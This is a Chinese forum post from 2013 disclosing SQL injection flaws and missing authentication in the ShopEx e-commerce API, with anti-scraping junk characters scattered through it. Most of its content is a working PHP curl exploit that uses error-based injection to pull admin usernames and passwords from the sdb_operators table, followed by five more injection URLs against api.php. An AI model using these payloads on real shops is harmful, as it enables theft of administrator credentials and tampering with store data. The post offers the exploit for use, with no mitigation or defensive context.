|
|
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
% `9 g8 I+ P7 d- C. ~( jcore\api\payment\1.0\api_b2b_2_0_payment_cfg.php
, ?' S' B7 P1 P# t
0 q( j, ~2 Y& l( Z8 s9 h第44行 $data['columns'] 未做过滤导致注入
+ [$ k% D4 M( n4 ?6 [
/ j- r5 x4 K& p# [8 k<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.* M4 n# x1 e* n% Q
! m1 ]8 ^3 ^0 \4 n4 i$ N注射1:
' b3 o: p) }/ D% S, w% v, F" Y
% ]; T0 \. v5 ehttp://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
9 u& \3 _3 @2 |- t( J: i2 V4 Y
- f& z0 ~5 s% |! j' ~9 P7 t注射2:( f' ~, z+ {: d# w7 W. I/ s9 ^5 }
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}1 H3 P6 N0 m L
! t+ T5 y. a3 B) ^) z7 y注射3:
2 X7 J0 \; K: L4 A# y http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx
" ~4 w' A' s+ t. G, v; R1 w9 q) M注射4:" O% s, ~5 I- o7 G
" m2 I& d. d0 |& C
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=15 t& |+ s: Y! x$ l. E
- \, e6 o: t! L8 G# F/ W
/ w( L6 e" S: S, q注射5:& i0 T2 ~2 {. _( F
http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx$ D2 D, Q$ o: h$ e3 ?
! @7 k, C6 V+ c0 w' ]3 X
, b* z; p+ A3 W" p. H
7 @4 \' ~) s5 w9 y7 D
1 P. Q7 ~4 `3 C" Y! \. H% e- j# ^) v$ Z2 L1 R3 _# Q
5 e, T' D* H- o0 A% b' m |
|
发表于 2013-7-27 18:34:27
收藏
支持
反对